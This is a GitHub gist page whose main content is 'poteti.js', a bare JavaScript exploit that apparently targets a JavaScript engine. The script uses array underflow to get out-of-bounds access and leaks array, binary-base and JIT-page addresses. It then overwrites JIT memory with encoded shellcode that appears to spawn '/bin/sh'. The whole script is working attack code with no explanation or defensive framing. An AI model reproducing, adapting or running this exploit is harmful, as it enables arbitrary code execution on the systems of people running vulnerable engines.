Skip to content

Instantly share code, notes, and snippets.

@akiym

akiym/poteti.js Secret

Last active December 1, 2018 14:29
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save akiym/966b3d24146edb685b8a08edee551de2 to your computer and use it in GitHub Desktop.
Save akiym/966b3d24146edb685b8a08edee551de2 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
poteti.js
var a = ["AAAA"];
function lf_to_i(d){
var ar = new Uint32Array(new Float64Array([d]).buffer);
return ar[1]*0x100000000 + ar[0];
}
function i_to_lf(x){
return new Float64Array(new Uint32Array([x/0x100000000, x%0x100000000]).buffer)[0];
}
function i2_to_d(x){
return new Float64Array(new Uint32Array([x[1], x[0]]).buffer)[0];
}
a.pop()
a.pop()
array_addr = lf_to_i(a[0x3a]) - 0x3498
print(array_addr)
pie_addr = lf_to_i(a[0x3c])
print(pie_addr)
jit_addr = lf_to_i(a[0x1e83a]) - 0x8
print(jit_addr)
var t = (jit_addr-array_addr)/8;
sc = [[1348096094, 1354772808], [795765090, 791658312], [1414990063, 3242748019], [2425393157, 255570015]];
for (var i=t; i<t+10001; i++) {
a[i] = i2_to_d(sc[i%sc.length]);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment